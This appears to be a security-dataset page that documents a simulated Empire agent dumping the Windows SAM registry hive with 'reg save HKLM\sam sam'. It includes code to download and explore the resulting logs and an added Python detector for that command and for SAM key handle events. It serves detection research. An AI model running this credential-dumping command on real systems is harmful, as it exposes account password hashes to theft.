Empire Reg Dump SAM Hive

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/06/25

Modification Date

2019/06/25

Tactics

TA0006

Techniques

T1003.002

Tags

SAM Request Handle

Dataset Description

This dataset represents an adversary with administrator privileges using the Windows reg utility to dump the SAM registry hive to a file.

Simulation Metadata

Tools

Type                  Name                       Module
Interactive Session   Remote Desktop Protocol    None

Adversary View

(Empire: WE8XYD3K) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
WE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5972   5/0.0    2020-09-22 08:27:49  http            

(Empire: agents) > interact WE8XYD3K
(Empire: WE8XYD3K) > shell reg save HKLM\sam sam
[*] Tasked WE8XYD3K to run TASK_SHELL
[*] Agent WE8XYD3K tasked with task ID 5
(Empire: WE8XYD3K) > 
The operation completed successfully.

..Command execution completed.

(Empire: WE8XYD3K) >

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

# URL of the zipped JSON-lines dataset (the string was missing its quotes)
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_reg_dump_sam.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()
# Unzip in memory and extract the first member (the .json file) to the working directory
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

import pandas as pd

# The dataset is JSON lines (one event per line), hence lines=True
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

# Count events per log channel (Security, Sysmon, PowerShell, ...) to see what the dataset contains
df.groupby(['Channel']).size().sort_values(ascending=False)
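The three steps above only load the dataset and count events per channel. The example below, added here and not part of the original dataset page, carries that exploration through to a detection: it parses JSON-lines events with the standard library (so it runs offline without pandas or the download), reproduces the per-channel count, and then flags the two artefacts this dataset is about, a reg.exe process saving the SAM hive and a Security handle-request event on the SAM registry key (the "SAM Request Handle" tag). The embedded events are constructed; the field names (Channel, EventID, Image, CommandLine, ObjectType, ObjectName, ProcessName) are assumed to follow the Sysmon and Security event fields as the dataset's JSON lines carry them.

```python
import json
import re
from collections import Counter

# Constructed sample events in JSON-lines form (field names assumed to mirror
# the Sysmon / Security fields in the real dataset; values are made up).
_SAMPLE = [
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Hostname": "WORKSTATION5", "User": "THESHIRE\\pgustavo",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "reg save HKLM\\sam sam"},
    {"Channel": "Security", "EventID": 4656, "Hostname": "WORKSTATION5",
     "SubjectUserName": "pgustavo", "ObjectType": "Key",
     "ObjectName": "\\REGISTRY\\MACHINE\\SAM",
     "ProcessName": "C:\\Windows\\System32\\reg.exe"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Hostname": "WORKSTATION5", "User": "THESHIRE\\pgustavo",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Hostname": "WORKSTATION5", "User": "THESHIRE\\pgustavo",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "\"C:\\Windows\\System32\\reg.exe\" SAVE \"HKEY_LOCAL_MACHINE\\SAM\" out.hiv"},
    {"Channel": "Security", "EventID": 4624, "Hostname": "WORKSTATION5",
     "TargetUserName": "pgustavo", "LogonType": 10},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in _SAMPLE)


def load_events(jsonl_text):
    """Parse JSON-lines text (one event object per line) into a list of dicts."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def events_per_channel(events):
    """Same view as df.groupby(['Channel']).size(), without pandas."""
    return Counter(e.get("Channel", "") for e in events)


# Registry path tokens that name the SAM hive, in either short or long root form.
_SAM_HIVE = re.compile(r"^(HKLM|HKEY_LOCAL_MACHINE)\\SAM(\\|$)", re.IGNORECASE)


def is_reg_sam_save(command_line):
    """True when a command line is reg/reg.exe invoked with 'save' on the SAM hive."""
    tokens = command_line.replace('"', "").split()
    if not tokens:
        return False
    exe = tokens[0].rsplit("\\", 1)[-1].lower()      # basename, quotes stripped
    if exe not in ("reg", "reg.exe"):
        return False
    if "save" not in {t.lower() for t in tokens[1:]}:
        return False
    return any(_SAM_HIVE.match(t) for t in tokens[1:])


def find_sam_hive_dumps(events):
    """Process-creation events (Sysmon 1 or Security 4688) where reg.exe saves the SAM hive."""
    return [e for e in events
            if e.get("EventID") in (1, 4688) and is_reg_sam_save(e.get("CommandLine", ""))]


def find_sam_key_handles(events):
    """Security 4656/4663 registry-key handle events on the SAM hive.

    These only appear if the Audit Registry subcategory is enabled and the SAM key
    carries a SACL; lsass.exe opens this key legitimately, so tune an allowlist of
    expected ProcessName values for your environment rather than alerting on all hits.
    """
    hits = []
    for e in events:
        if e.get("Channel") != "Security" or e.get("EventID") not in (4656, 4663):
            continue
        if e.get("ObjectType") != "Key":
            continue
        if e.get("ObjectName", "").upper().startswith("\\REGISTRY\\MACHINE\\SAM"):
            hits.append(e)
    return hits


if __name__ == "__main__":
    evts = load_events(SAMPLE_JSONL)
    print(events_per_channel(evts))
    for e in find_sam_hive_dumps(evts):
        print("SAM hive dump:", e["Hostname"], e["User"], e["CommandLine"])
    for e in find_sam_key_handles(evts):
        print("SAM key handle:", e["Hostname"], e["ProcessName"], e["ObjectName"])
```

To run the same logic against the real dataset, replace SAMPLE_JSONL with the contents of datasetJSONPath from the download step; the command-line check is the portable signal (it needs only process-creation logging), while the handle-request check depends on registry object auditing being configured on the host that produced the logs.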